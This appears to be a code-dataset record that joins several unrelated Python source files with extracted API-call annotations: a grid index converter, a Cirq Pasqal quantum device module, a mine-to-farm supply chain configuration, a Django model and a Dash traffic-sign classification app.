print(self.nbins, self.ndim, self.nbins ** self.ndim)
raise Exception("Invalid index %s. You are probably outside the grid..." % bin_idx)
grid_idx = ((self._zerodim + bin_idx) / self._modulus) % (self.ngrid - 1)
return grid_idx.astype(int)
def convert_to_bin_idx(self, grid_idx):
bin_idx = utils.rint(np.sum(grid_idx * self._modulus))
if bin_idx >= self.nbins or bin_idx < 0:
raise Exception(
"Invalid bin index %s. You are probably outside the grid. Size:%s" % (bin_idx, self.nbins))
return bin_idx
| [
"logging.basicConfig",
"logging.getLogger",
"numpy.sum",
"numpy.zeros",
"numpy.empty",
"numpy.rint"
] | [((93, 249), 'logging.basicConfig', 'logging.basicConfig', ([], {'stream': 'sys.stdout', 'level': 'logging.DEBUG', 'format': '"""%(asctime)s %(name)s-%(levelname)s: %(message)s"""', 'datefmt': '"""%Y-%m-%d %H:%M:%S"""'}), "(stream=sys.stdout, level=logging.DEBUG, format=\n '%(asctime)s %(name)s-%(levelname)s: %(message)s', datefmt=\n '%Y-%m-%d %H:%M:%S')\n", (112, 249), False, 'import logging\n'), ((298, 333), 'logging.getLogger', 'logging.getLogger', (['"""indexconverter"""'], {}), "('indexconverter')\n", (315, 333), False, 'import logging\n'), ((556, 578), 'numpy.zeros', 'np.zeros', (['(self.ndim,)'], {}), '((self.ndim,))\n', (564, 578), True, 'import numpy as np\n'), ((852, 875), 'numpy.empty', 'np.empty', (['(self.nbins,)'], {}), '((self.nbins,))\n', (860, 875), True, 'import numpy as np\n'), ((604, 632), 'numpy.rint', 'np.rint', (['((ngrid - 1) ** ndim)'], {}), '((ngrid - 1) ** ndim)\n', (611, 632), True, 'import numpy as np\n'), ((1384, 1404), 'numpy.zeros', 'np.zeros', (['grid_shape'], {}), '(grid_shape)\n', (1392, 1404), True, 'import numpy as np\n'), ((1993, 2025), 'numpy.sum', 'np.sum', (['(grid_idx * self._modulus)'], {}), '(grid_idx * self._modulus)\n', (1999, 2025), True, 'import numpy as np\n'), ((1084, 1103), 'numpy.zeros', 'np.zeros', (['self.ndim'], {}), '(self.ndim)\n', (1092, 1103), True, 'import numpy as np\n')] |
# Copyright 2020 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import FrozenSet, Callable, List, Sequence, Any, Union, Dict
import numpy as np
import networkx as nx
import cirq
from cirq import _compat, GridQubit, LineQubit
from cirq.ops import NamedQubit
from cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset
@cirq.value.value_equality
class PasqalDevice(cirq.devices.Device):
"""A generic Pasqal device.
The most general of Pasqal devices, enforcing only restrictions expected to
be shared by all future devices. Serves as the parent class of all Pasqal
devices, but can also be used on its own for hosting a nearly unconstrained
device. When used as a circuit's device, the qubits have to be of the type
cirq.NamedQubit and assumed to be all connected, the idea behind it being
that after submission, all optimization and transpilation necessary for its
execution on the specified device are handled internally by Pasqal.
"""
def __init__(self, qubits: Sequence[cirq.Qid]) -> None:
"""Initializes a device with some qubits.
Args:
qubits (NamedQubit): Qubits on the device, exclusively unrelated to
a physical position.
Raises:
TypeError: If the wrong qubit type is provided.
ValueError: If the number of qubits is greater than the devices maximum.
"""
if len(qubits) > 0:
q_type = type(qubits[0])
for q in qubits:
if not isinstance(q, self.supported_qubit_type):
raise TypeError(
'Unsupported qubit type: {!r}. This device '
'supports qubit types: {}'.format(q, self.supported_qubit_type)
)
if not type(q) is q_type:
raise TypeError("All qubits must be of same type.")
if len(qubits) > self.maximum_qubit_number:
raise ValueError(
'Too many qubits. {} accepts at most {} '
'qubits.'.format(type(self), self.maximum_qubit_number)
)
self.gateset = PasqalGateset()
self.qubits = qubits
self._metadata = cirq.DeviceMetadata(
qubits, nx.from_edgelist([(a, b) for a in qubits for b in qubits if a != b])
)
# pylint: enable=missing-raises-doc
@property
def supported_qubit_type(self):
return (NamedQubit,)
@property
def maximum_qubit_number(self):
return 100
@property
def metadata(self):
return self._metadata
@_compat.deprecated(fix='Use metadata.qubit_set() if applicable.', deadline='v0.15')
def qubit_set(self) -> FrozenSet[cirq.Qid]:
return frozenset(self.qubits)
def qubit_list(self):
return [qubit for qubit in self.qubits]
def is_pasqal_device_op(self, op: cirq.Operation) -> bool:
if not isinstance(op, cirq.Operation):
raise ValueError('Got unknown operation:', op)
return op in self.gateset
def validate_operation(self, operation: cirq.Operation):
"""Raises an error if the given operation is invalid on this device.
Args:
operation: The operation to validate.
Raises:
ValueError: If the operation is not valid.
NotImplementedError: If the operation is a measurement with an invert
mask.
"""
if not isinstance(operation, cirq.GateOperation):
raise ValueError("Unsupported operation")
if not self.is_pasqal_device_op(operation):
raise ValueError(f'{operation.gate!r} is not a supported gate')
for qub in operation.qubits:
if not isinstance(qub, self.supported_qubit_type):
raise ValueError(
'{} is not a valid qubit for gate {!r}. This '
'device accepts gates on qubits of type: '
'{}'.format(qub, operation.gate, self.supported_qubit_type)
)
if qub not in self.metadata.qubit_set:
raise ValueError(f'{qub} is not part of the device.')
if isinstance(operation.gate, cirq.MeasurementGate):
if operation.gate.invert_mask != ():
raise NotImplementedError(
"Measurements on Pasqal devices don't support invert_mask."
)
def validate_circuit(self, circuit: 'cirq.AbstractCircuit') -> None:
"""Raises an error if the given circuit is invalid on this device.
A circuit is invalid if any of its moments are invalid or if there
is a non-empty moment after a moment with a measurement.
Args:
circuit: The circuit to validate
Raises:
ValueError: If the given circuit can't be run on this device
"""
super().validate_circuit(circuit)
# Measurements must be in the last non-empty moment
has_measurement_occurred = False
for moment in circuit:
if has_measurement_occurred:
if len(moment.operations) > 0:
raise ValueError("Non-empty moment after measurement")
for operation in moment.operations:
if isinstance(operation.gate, cirq.MeasurementGate):
has_measurement_occurred = True
def __repr__(self):
return f'pasqal.PasqalDevice(qubits={sorted(self.qubits)!r})'
def _value_equality_values_(self):
return self.qubits
def _json_dict_(self):
return cirq.protocols.obj_to_dict_helper(self, ['qubits'])
class PasqalVirtualDevice(PasqalDevice):
"""A Pasqal virtual device with qubits in 3d.
A virtual representation of a Pasqal device, enforcing the constraints
typically found in a physical device. The qubits can be positioned in 3d
space, although 2d layouts will be supported sooner and are thus
recommended. Only accepts qubits with physical placement.
"""
def __init__(
self, control_radius: float, qubits: Sequence[Union[ThreeDQubit, GridQubit, LineQubit]]
) -> None:
"""Initializes a device with some qubits.
Args:
control_radius: the maximum distance between qubits for a controlled
gate. Distance is measured in units of the coordinates passed
into the qubit constructor.
qubits: Qubits on the device, identified by their x, y, z position.
Must be of type ThreeDQubit, TwoDQubit, LineQubit or GridQubit.
Raises:
ValueError: if the wrong qubit type is provided or if invalid
parameter is provided for control_radius."""
super().__init__(qubits)
if not control_radius >= 0:
raise ValueError('Control_radius needs to be a non-negative float.')
if len(self.qubits) > 1:
if control_radius > 3.0 * self.minimal_distance():
raise ValueError(
'Control_radius cannot be larger than 3 times'
' the minimal distance between qubits.'
)
self.control_radius = control_radius
self.gateset = PasqalGateset(include_additional_controlled_ops=False)
self.controlled_gateset = cirq.Gateset(cirq.AnyIntegerPowerGateFamily(cirq.CZPowGate))
@property
def supported_qubit_type(self):
return (ThreeDQubit, TwoDQubit, GridQubit, LineQubit)
def validate_operation(self, operation: cirq.Operation):
"""Raises an error if the given operation is invalid on this device.
Args:
operation: the operation to validate
Raises:
ValueError: If the operation is not valid
"""
super().validate_operation(operation)
# Verify that a controlled gate operation is valid
if operation in self.controlled_gateset:
for p in operation.qubits:
for q in operation.qubits:
if self.distance(p, q) > self.control_radius:
raise ValueError(f"Qubits {p!r}, {q!r} are too far away")
def validate_moment(self, moment: cirq.Moment):
"""Raises an error if the given moment is invalid on this device.
Args:
moment: The moment to validate.
Raises:
ValueError: If the given moment is invalid.
"""
super().validate_moment(moment)
if len(moment) > 1:
for operation in moment:
if not isinstance(operation.gate, cirq.MeasurementGate):
raise ValueError("Cannot do simultaneous gates. Use cirq.InsertStrategy.NEW.")
def minimal_distance(self) -> float:
"""Returns the minimal distance between two qubits in qubits.
Args:
qubits: qubit involved in the distance computation
Raises:
ValueError: If the device has only one qubit
Returns:
The minimal distance between qubits, in spacial coordinate units.
"""
if len(self.qubits) <= 1:
raise ValueError("Two qubits to compute a minimal distance.")
return min([self.distance(q1, q2) for q1 in self.qubits for q2 in self.qubits if q1 != q2])
def distance(self, p: Any, q: Any) -> float:
"""Returns the distance between two qubits.
Args:
p: qubit involved in the distance computation
q: qubit involved in the distance computation
Raises:
ValueError: If p or q not part of the device
Returns:
The distance between qubits p and q.
"""
all_qubits = self.qubit_list()
if p not in all_qubits or q not in all_qubits:
raise ValueError("Qubit not part of the device.")
if isinstance(p, GridQubit):
return np.sqrt((p.row - q.row) ** 2 + (p.col - q.col) ** 2)
if isinstance(p, LineQubit):
return abs(p.x - q.x)
return np.sqrt((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2)
def __repr__(self):
return ('pasqal.PasqalVirtualDevice(control_radius={!r}, qubits={!r})').format(
self.control_radius, sorted(self.qubits)
)
def _value_equality_values_(self) -> Any:
return (self.control_radius, self.qubits)
def _json_dict_(self) -> Dict[str, Any]:
return cirq.protocols.obj_to_dict_helper(self, ['control_radius', 'qubits'])
@_compat.deprecated_class(
deadline='v0.16', fix='Use cirq.optimize_for_target_gateset(circuit, gateset=PasqalGateset()).'
)
class PasqalConverter(cirq.neutral_atoms.ConvertToNeutralAtomGates):
"""A gate converter for compatibility with Pasqal processors.
Modified version of ConvertToNeutralAtomGates, where a new 'convert' method
'pasqal_convert' takes the 'keep' function as an input.
"""
def pasqal_convert(
self, op: cirq.Operation, keep: Callable[[cirq.Operation], bool]
) -> List[cirq.Operation]:
def on_stuck_raise(bad):
return TypeError(
"Don't know how to work with {!r}. "
"It isn't a native PasqalDevice operation, "
"a 1 or 2 qubit gate with a known unitary, "
"or composite.".format(bad)
)
return cirq.protocols.decompose(
op,
keep=keep,
intercepting_decomposer=self._convert_one,
on_stuck_raise=None if self.ignore_failures else on_stuck_raise,
)
| [
"numpy.sqrt",
"cirq.protocols.decompose",
"cirq.AnyIntegerPowerGateFamily",
"cirq._compat.deprecated",
"networkx.from_edgelist",
"cirq._compat.deprecated_class",
"cirq.protocols.obj_to_dict_helper",
"cirq_pasqal.PasqalGateset"
] | [((10990, 11116), 'cirq._compat.deprecated_class', '_compat.deprecated_class', ([], {'deadline': '"""v0.16"""', 'fix': '"""Use cirq.optimize_for_target_gateset(circuit, gateset=PasqalGateset())."""'}), "(deadline='v0.16', fix=\n 'Use cirq.optimize_for_target_gateset(circuit, gateset=PasqalGateset()).')\n", (11014, 11116), False, 'from cirq import _compat, GridQubit, LineQubit\n'), ((3091, 3179), 'cirq._compat.deprecated', '_compat.deprecated', ([], {'fix': '"""Use metadata.qubit_set() if applicable."""', 'deadline': '"""v0.15"""'}), "(fix='Use metadata.qubit_set() if applicable.', deadline=\n 'v0.15')\n", (3109, 3179), False, 'from cirq import _compat, GridQubit, LineQubit\n'), ((2636, 2651), 'cirq_pasqal.PasqalGateset', 'PasqalGateset', ([], {}), '()\n', (2649, 2651), False, 'from cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset\n'), ((6074, 6125), 'cirq.protocols.obj_to_dict_helper', 'cirq.protocols.obj_to_dict_helper', (['self', "['qubits']"], {}), "(self, ['qubits'])\n", (6107, 6125), False, 'import cirq\n'), ((7717, 7771), 'cirq_pasqal.PasqalGateset', 'PasqalGateset', ([], {'include_additional_controlled_ops': '(False)'}), '(include_additional_controlled_ops=False)\n', (7730, 7771), False, 'from cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset\n'), ((10519, 10582), 'numpy.sqrt', 'np.sqrt', (['((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2)'], {}), '((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2)\n', (10526, 10582), True, 'import numpy as np\n'), ((10917, 10986), 'cirq.protocols.obj_to_dict_helper', 'cirq.protocols.obj_to_dict_helper', (['self', "['control_radius', 'qubits']"], {}), "(self, ['control_radius', 'qubits'])\n", (10950, 10986), False, 'import cirq\n'), ((11843, 11999), 'cirq.protocols.decompose', 'cirq.protocols.decompose', (['op'], {'keep': 'keep', 'intercepting_decomposer': 'self._convert_one', 'on_stuck_raise': '(None if self.ignore_failures else on_stuck_raise)'}), '(op, keep=keep, intercepting_decomposer=self.\n _convert_one, on_stuck_raise=None if self.ignore_failures else\n on_stuck_raise)\n', (11867, 11999), False, 'import cirq\n'), ((2747, 2815), 'networkx.from_edgelist', 'nx.from_edgelist', (['[(a, b) for a in qubits for b in qubits if a != b]'], {}), '([(a, b) for a in qubits for b in qubits if a != b])\n', (2763, 2815), True, 'import networkx as nx\n'), ((7819, 7865), 'cirq.AnyIntegerPowerGateFamily', 'cirq.AnyIntegerPowerGateFamily', (['cirq.CZPowGate'], {}), '(cirq.CZPowGate)\n', (7849, 7865), False, 'import cirq\n'), ((10378, 10430), 'numpy.sqrt', 'np.sqrt', (['((p.row - q.row) ** 2 + (p.col - q.col) ** 2)'], {}), '((p.row - q.row) ** 2 + (p.col - q.col) ** 2)\n', (10385, 10430), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
from enum import Enum, IntEnum, unique
import os
APP_NAME = "mine2farm"
NETWORK_NAME = "CenterAxis"
LOG_LEVEL_CONSOLE = "WARNING"
LOG_LEVEL_FILE = "INFO"
APP_FOLDER = os.getenv("JESA_MINE2FARM_HOME", "C:/GitRepos/mine2farm/")
LOG_FOLDER = APP_FOLDER + "app/log/"
LOG_FILE = "%(asctime)_" + APP_NAME + ".log"
OUTPUT_FOLDER = "%s%s" % (APP_FOLDER, "outputs/")
CANVAS_URL = "http://127.0.0.1/canvas.xlsm"
# DB
DB_NAME = None
DB_HOST = "172.29.161.208"
DB_PORT = 5006
DATA_SERVICE_ADD = "172.29.161.208"
DATA_SERVICE_PORT = 5001
# Results
DB_RESULT_NAME = "%s_results" % DB_NAME if DB_NAME is not None else None
DB_DETAILED_RESULT_COLLECTION_NAME = "detailed"
DB_GLOBAL_RESULT_COLLECTION_NAME = "global"
DB_GLOBAL_BEST_RESULT_COLLECTION_NAME = "global_best"
DB_DETAILED_BEST_RESULT_COLLECTION_NAME = "detailed_best"
DB_SENSITIVITY_COLLECTION_NAME = "sensitivity"
RESULT_BATCHES_SIZE = 25
HEAD_DATA_BITS = 17
DB_NAME_BITS = 20
RANDOMIZE_RESULTS = False
# RabbitMQ
RABBITMQ_SERVER = "localhost"
RABBITMQ_SIMULATOR_QUEUE_NAME = "SIMULATE"
RABBITMQ_CYCLE = 3
RABBITMQ_DETAILED_RESULT_QUEUE_NAME = "SAVE_DETAIL"
RABBITMQ_GLOBAL_RESULT_QUEUE_NAME = "SAVE_GLOBAL"
RABBITMQ_MAX_WORKER = RABBITMQ_CYCLE
RABBITMQ_PATH = "C:\\Program Files\\RabbitMQ Server\\rabbitmq_server-3.8.1\\sbin"
# Memcached
MEMCACHED_SERVER = 'localhost'
MEMCACHED_PORT = 11211
# Dashboard
DB_LOAD_FROM_SERVICE = True
# Monitoring
MONITORING_APP_NAME = "mine2farm_monitor"
MONITORING_SERVER = "172.29.161.208"
MONITORING_PORT = 5002
MONITORING_DB_NAME = "task_history"
MONITORING_COLLECTION_HISTORY_NAME = "task"
MONITORING_COLLECTION_HISTORY_BEST_NAME = "best_scenarios_history"
MONITORING_STEP = 1
MONITORING_NB_PAGE = 10
# Mongodb-bi
MONGODB_BI_PATH = "C:\\Program Files\\MongoDB\\Connector for BI\\2.13\\bin"
# Mongodb
MONGO_SERVER_PATH = "C:\\Program Files\\MongoDB\\Server\\4.0\\bin"
# params
LOGISTICS_LP = False
MODE_DEBUG = False
GRANUL_RELAX = False
class HTML_STATUS(IntEnum):
ERROR = -1
OK = 0
# Model
MONIKER_SEPARATOR = "/"
WACC = 0.1
T0 = 2020
TMAX = 2031
class PriceParams(Enum):
WACC = 0
TENOR = 1
VOLUME = 2
class PipelineType(Enum):
COMMON = 0
PRODUCER = 1
TRANSPORT = 2
BALANCE = 3
PRICE = 4
SALES = 5
@unique
class PipelineLayer(IntEnum):
UNDEFINED = -1
MINE = 0
BENEFICIATION = 1
SAP = 2
PAP = 3
GRANULATION = 4
LOGISTICS = 5
RAW_MATERIALS = 8
COMMON = 9
SALES_PLAN = 10
MINE_BENEFICIATION = 11
UNIT_CONVERSION_MATRIX = 12
PIPELINE_SCHEMA = {
PipelineLayer.COMMON: {
"type": PipelineType.COMMON,
"dico": ["location", "opex", "unit", "currency", "output", "names", "products"]
},
PipelineLayer.MINE: {
"type": PipelineType.PRODUCER,
"dico": ["mine.name", "mine.extraction", "mine.quality", "mine.capex"],
"options": "mining_options",
"production": "mining_specific_production",
"opex": "mining_opex___specific_consumptions",
"capex": "mining_capex",
"priority_mines": "prioritymines"
},
PipelineLayer.BENEFICIATION: {
"type": PipelineType.PRODUCER,
"dico": ["beneficiation.name", "beneficitation.process", "beneficitation.quality", "beneficitation.capex"],
"options": "beneficiation_options",
"production": "beneficiation_production",
"opex": "beneficiation_opex___specific_consumptions",
"capex": "beneficiation_capex"
},
PipelineLayer.SAP: {
"type": PipelineType.PRODUCER,
"dico": ["sap.name", "sap.process", "sap.product", "sap.capex", "sap.capacity[kt]"],
"options": "sap___power_plant_options",
"production": "sap___power_plant_production",
"opex": "sap___power_plant_opex___specific_consumptions",
"capex": "sap___power_plant_capex",
"product_type": "sap.product"
},
PipelineLayer.PAP: {
"type": PipelineType.PRODUCER,
"dico": ["pap.name", "pap.process", "pap.product", "pap.capex", "pap.size[kt]", "pap.input"],
"options": "pap_options",
"production": "pap_production",
"opex": "pap_opex___specific_consumptions",
"capex": "pap_capex",
"product_type": "pap.product"
},
PipelineLayer.GRANULATION: {
"type": PipelineType.PRODUCER,
"dico": ["granulation.name", "granulation.process", "granulation.product", "granulation.capex", "granulation.input"],
"options": "granulation_options",
"production": "granulation_production",
"opex": "granulation_opex",
"capex": "granulation_capex"
},
PipelineLayer.LOGISTICS: {
"type": PipelineType.TRANSPORT,
"dico": ["logistics.name", "logistics.process", "logistics.product", "logistics.capex"],
"options": "logistics_options",
"production": None,
"opex": "logistics_opex",
"capex": "logistics_capex"
},
PipelineLayer.RAW_MATERIALS: {
"type": PipelineType.PRICE,
"data": "raw_materials"
},
PipelineLayer.SALES_PLAN: {
"type": PipelineType.SALES,
"data": "sales_plan"
},
PipelineLayer.UNIT_CONVERSION_MATRIX: {
"type": PipelineType.COMMON,
"data": "conv_matrix"
},
}
SUPPLY_CHAIN = "mine2port"
DEPARTURE_ARRIVAL = {SUPPLY_CHAIN: (PipelineLayer.MINE),
"sap2pap": (PipelineLayer.SAP, PipelineLayer.PAP)}
COMBO_NODES = {
PipelineLayer.MINE_BENEFICIATION: {
"url": "mining_wp_connections",
"upstream_layer": PipelineLayer.MINE,
"downstream_layer": PipelineLayer.BENEFICIATION
}
}
COMBO_NODES_SEPARATION = "--"
class FunctionType(Enum):
COST_PV = 0
CASH_COST = 1
FULL_COST = 2
class ScenarioGeneratorType(IntEnum):
FROM_PATHS = 0
FROM_OPTIONS = 1
SPECIFIC_SCENARIOS = 2
SCENARIO_GEN_TYPE = ScenarioGeneratorType.FROM_OPTIONS
PIPELINE_METADATA = {
PipelineLayer.MINE: {
"type": PipelineType.PRODUCER,
"production": ["Name", "Extraction", "Quality", "Unit"],
"opex": ["Name", "Extraction", "Capacity", "Item", "Unit"],
"capex": ["Name", "Extraction", "Capacity", "Item", "Unit", "CAPEX"]
},
PipelineLayer.BENEFICIATION: {
"type": PipelineType.PRODUCER,
"production": ["Process", "InputQuality", "OutputQuality", "Humidity", "Unit"],
"opex": ["Process", "InputQuality", "OutputQuality", "Item", "Unit"],
"capex": ["Name", "Process", "Capacity", "Item", "Unit", "CAPEX"]
},
PipelineLayer.SAP: {
"type": PipelineType.PRODUCER,
"production": ["Location", "Process", "Product", "Unit"],
"opex": ["Location", "Process", "Item", "Unit"],
"capex": ["Location", "Process", "Capacity", "Item", "Unit", "CAPEX"]
},
PipelineLayer.PAP: {
"type": PipelineType.PRODUCER,
"production": ["Process", "Input", "Product", "Unit"],
"opex": ["Location", "Process", "Capacity", "Input", "Item", "Product", "Unit"],
"capex": ["Location", "Process", "Capacity", "Item", "Unit", "CAPEX"]
},
PipelineLayer.GRANULATION: {
"type": PipelineType.PRODUCER,
"production": ["Process", "Input", "Product", "Unit"],
"opex": ["Location", "ProductionSite", "Process", "Capacity", "Product", "Item", "Unit"],
"capex": ["Location", "ProductionSite", "Product", "Process", "Capacity", "Item", "Unit", "CAPEX"]
},
PipelineLayer.LOGISTICS: {
"type": PipelineType.TRANSPORT,
"opex": ["Upstream", "Downstream", "Method", "Product", "Capacity", "Item", "Unit"],
"capex": ["Upstream", "Downstream", "Method", "Product", "Capacity", "Item", "Unit", "CAPEX"]
},
PipelineLayer.RAW_MATERIALS: {
"type": PipelineType.PRICE,
"columns": ["Item", "Unit"]
},
PipelineLayer.SALES_PLAN: {
"type": PipelineType.PRICE,
"columns": ["Type", "Product", "Unit"]
},
PipelineLayer.UNIT_CONVERSION_MATRIX: {
"type": PipelineType.COMMON,
"columns": ["Initial Unit", "Uniform Unit", "Conversion Rate"]
},
}
class ShuffleLevel(IntEnum):
UNDEFINED = 0
SHUFFLE_WITHOUT_PERM = 1
SHUFFLE_WITH_PERMUTATIONS = 2
SHUFFLE_WITH_PERMUTATIONS_WITH_FILTERS = 3
SHUFFLE_WITH_UNNAMED = 4
SHUFFLE_LEVELS = {
PipelineLayer.MINE: ShuffleLevel.UNDEFINED,
PipelineLayer.BENEFICIATION: ShuffleLevel.UNDEFINED,
PipelineLayer.SAP: ShuffleLevel.SHUFFLE_WITH_UNNAMED,
PipelineLayer.PAP: ShuffleLevel.SHUFFLE_WITH_UNNAMED,
PipelineLayer.GRANULATION: ShuffleLevel.UNDEFINED,
PipelineLayer.LOGISTICS: ShuffleLevel.UNDEFINED,
PipelineLayer.MINE_BENEFICIATION: ShuffleLevel.UNDEFINED
} | [
"os.getenv"
] | [((195, 253), 'os.getenv', 'os.getenv', (['"""JESA_MINE2FARM_HOME"""', '"""C:/GitRepos/mine2farm/"""'], {}), "('JESA_MINE2FARM_HOME', 'C:/GitRepos/mine2farm/')\n", (204, 253), False, 'import os\n')] |
from django.db import models
# Create your models here.
class Destination(models.Model) :
name = models.CharField(max_length = 100)
img = models.ImageField(upload_to = 'pics')
desc = models.TextField()
price = models.IntegerField()
offer = models.BooleanField(default = False)
class News() :
id : int
img : str
date : int
month : str
headline : str
category : str
desc : str | [
"django.db.models.TextField",
"django.db.models.IntegerField",
"django.db.models.BooleanField",
"django.db.models.ImageField",
"django.db.models.CharField"
] | [((103, 135), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (119, 135), False, 'from django.db import models\n'), ((148, 183), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': '"""pics"""'}), "(upload_to='pics')\n", (165, 183), False, 'from django.db import models\n'), ((197, 215), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (213, 215), False, 'from django.db import models\n'), ((228, 249), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (247, 249), False, 'from django.db import models\n'), ((262, 296), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (281, 296), False, 'from django.db import models\n')] |
import base64
import io
import dash
import dash_core_components as dcc
import dash_html_components as html
import dash_bootstrap_components as dbc
from dash.dependencies import Input, Output
import numpy as np
import tensorflow as tf
from PIL import Image
from constants import CLASSES
import yaml
with open('app.yaml') as yaml_data :
params = yaml.safe_load(yaml_data)
IMAGE_WIDTH = params['IMAGE_WIDTH']
IMAGE_HEIGHT = params['IMAGE_HEIGHT']
PATH_MODEL = params['PATH_MODEL']
# Load DNN model
classifier = tf.keras.models.load_model(PATH_MODEL)
def classify_image(image, model, image_box=None):
"""Classify image by model
Parameters
----------
content: image content
model: tf/keras classifier
Returns
-------
class id returned by model classifier
"""
images_list = []
image = image.resize((IMAGE_WIDTH, IMAGE_HEIGHT), box=image_box)
# box argument clips image to (x1, y1, x2, y2)
image = np.array(image)
images_list.append(image)
return model.predict_classes(np.array(images_list))
app = dash.Dash('Traffic Signs Recognition', external_stylesheets=[dbc.themes.BOOTSTRAP])
pre_style = {
'whiteSpace': 'pre-wrap',
'wordBreak': 'break-all',
'whiteSpace': 'normal'
}
# Define application layout
navbar = dbc.NavbarSimple(
children=[
dbc.DropdownMenu(
children=[
dbc.DropdownMenuItem('Réseau de Neurones', header=True),
dbc.DropdownMenuItem('SVM', href="#"),
],
nav=True,
in_navbar=True,
label='Modèle',
),
],
brand="Menu",
brand_href="#",
color= "#d90054",
dark=True
)
cards = html.Div(
[
dbc.Card(
dbc.CardBody(
[
html.H5("Présentation", className="card-title"),
html.P(
[
'Cette application à pour but de réaliser des modèles capables de classer des panneaux de signalisation allemand à partir d\'une image. L\'application fonctionne de la manière suivante : vous déposer une image à l\'emplacement indiqué et la prédiction du modèle apparait immédiatement en dessous. En haut à droite vous pouvez sélectionner le modèle que vous voulez tester.',
],
className='card-text',
),
]
),
className='w-75 mb-3',
color='#f1cbd1',
outline='Black',
style={
'margin-top': '75px',
'margin-left': '185px'},
),
]
)
app.layout = html.Div([
html.Div([navbar]),
html.Div(cards),
dcc.Upload(
id='bouton-chargement',
children=html.Div([
'Cliquer-déposer ou ',
html.A('sélectionner une image')
]),
style={
'width': '50%',
'height': '60px',
'lineHeight': '60px',
'borderWidth': '1px',
'borderStyle': 'dashed',
'borderRadius': '5px',
'textAlign': 'center',
'margin-top': '75px',
'margin-left': '370px',
}
),
html.Div(id='mon-image'),
html.Div(id='ma-zone-resultat')
])
@app.callback(Output('mon-image', 'children'),
[Input('bouton-chargement', 'contents')])
def update_output(contents):
if contents is not None:
content_type, content_string = contents.split(',')
if 'image' in content_type:
image = Image.open(io.BytesIO(base64.b64decode(content_string)))
predicted_class = classify_image(image, classifier)[0]
return html.Div([
html.Hr(style={'margin-top': '75px'}),
html.Img(src=contents, style={'margin-left': '750px'}),
html.H4('Classe prédite : {}'.format(CLASSES[predicted_class]), style={'textAlign': 'center'}),
html.Hr(),
#html.Div('Raw Content'),
#html.Pre(contents, style=pre_style)
])
else:
try:
# Décodage de l'image transmise en base 64 (cas des fichiers ppm)
# fichier base 64 --> image PIL
image = Image.open(io.BytesIO(base64.b64decode(content_string)))
# image PIL --> conversion PNG --> buffer mémoire
buffer = io.BytesIO()
image.save(buffer, format='PNG')
# buffer mémoire --> image base 64
buffer.seek(0)
img_bytes = buffer.read()
content_string = base64.b64encode(img_bytes).decode('ascii')
# Appel du modèle de classification
predicted_class = classify_image(image, classifier)[0]
# Affichage de l'image
return html.Div([
html.Hr(style={'margin-top': '75px'}),
html.Img(src='data:image/png;base64,' + content_string, style={'margin-left': '750px'}),
html.H4('Classe prédite : {}'.format(CLASSES[predicted_class]), style={'textAlign': 'center'}),
html.Hr(),
])
except:
return html.Div([
html.Hr(),
html.Div('Uniquement des images svp : {}'.format(content_type)),
html.Hr(),
html.Div('Raw Content'),
html.Pre(contents, style=pre_style)
])
# Manage interactions with callbacks
@app.callback(
Output(component_id='ma-zone-resultat', component_property='children'),
[Input(component_id='mon-champ-texte', component_property='value')]
)
def update_output_div(input_value):
return html.H3('Valeur saisie ici "{}"'.format(input_value))
# Start the application
if __name__ == '__main__':
app.run_server(debug=True) | [
"dash_bootstrap_components.DropdownMenuItem",
"dash.dependencies.Output",
"base64.b64encode",
"io.BytesIO",
"dash_html_components.H5",
"base64.b64decode",
"dash.dependencies.Input",
"dash_html_components.Pre",
"yaml.safe_load",
"numpy.array",
"dash_html_components.Div",
"tensorflow.keras.models.load_model",
"dash_html_components.Img",
"dash_html_components.Hr",
"dash_html_components.P",
"dash.Dash",
"dash_html_components.A"
] | [((524, 562), 'tensorflow.keras.models.load_model', 'tf.keras.models.load_model', (['PATH_MODEL'], {}), '(PATH_MODEL)\n', (550, 562), True, 'import tensorflow as tf\n'), ((1083, 1171), 'dash.Dash', 'dash.Dash', (['"""Traffic Signs Recognition"""'], {'external_stylesheets': '[dbc.themes.BOOTSTRAP]'}), "('Traffic Signs Recognition', external_stylesheets=[dbc.themes.\n BOOTSTRAP])\n", (1092, 1171), False, 'import dash\n'), ((353, 378), 'yaml.safe_load', 'yaml.safe_load', (['yaml_data'], {}), '(yaml_data)\n', (367, 378), False, 'import yaml\n'), ((974, 989), 'numpy.array', 'np.array', (['image'], {}), '(image)\n', (982, 989), True, 'import numpy as np\n'), ((3345, 3376), 'dash.dependencies.Output', 'Output', (['"""mon-image"""', '"""children"""'], {}), "('mon-image', 'children')\n", (3351, 3376), False, 'from dash.dependencies import Input, Output\n'), ((5671, 5741), 'dash.dependencies.Output', 'Output', ([], {'component_id': '"""ma-zone-resultat"""', 'component_property': '"""children"""'}), "(component_id='ma-zone-resultat', component_property='children')\n", (5677, 5741), False, 'from dash.dependencies import Input, Output\n'), ((1052, 1073), 'numpy.array', 'np.array', (['images_list'], {}), '(images_list)\n', (1060, 1073), True, 'import numpy as np\n'), ((2702, 2720), 'dash_html_components.Div', 'html.Div', (['[navbar]'], {}), '([navbar])\n', (2710, 2720), True, 'import dash_html_components as html\n'), ((2731, 2746), 'dash_html_components.Div', 'html.Div', (['cards'], {}), '(cards)\n', (2739, 2746), True, 'import dash_html_components as html\n'), ((3265, 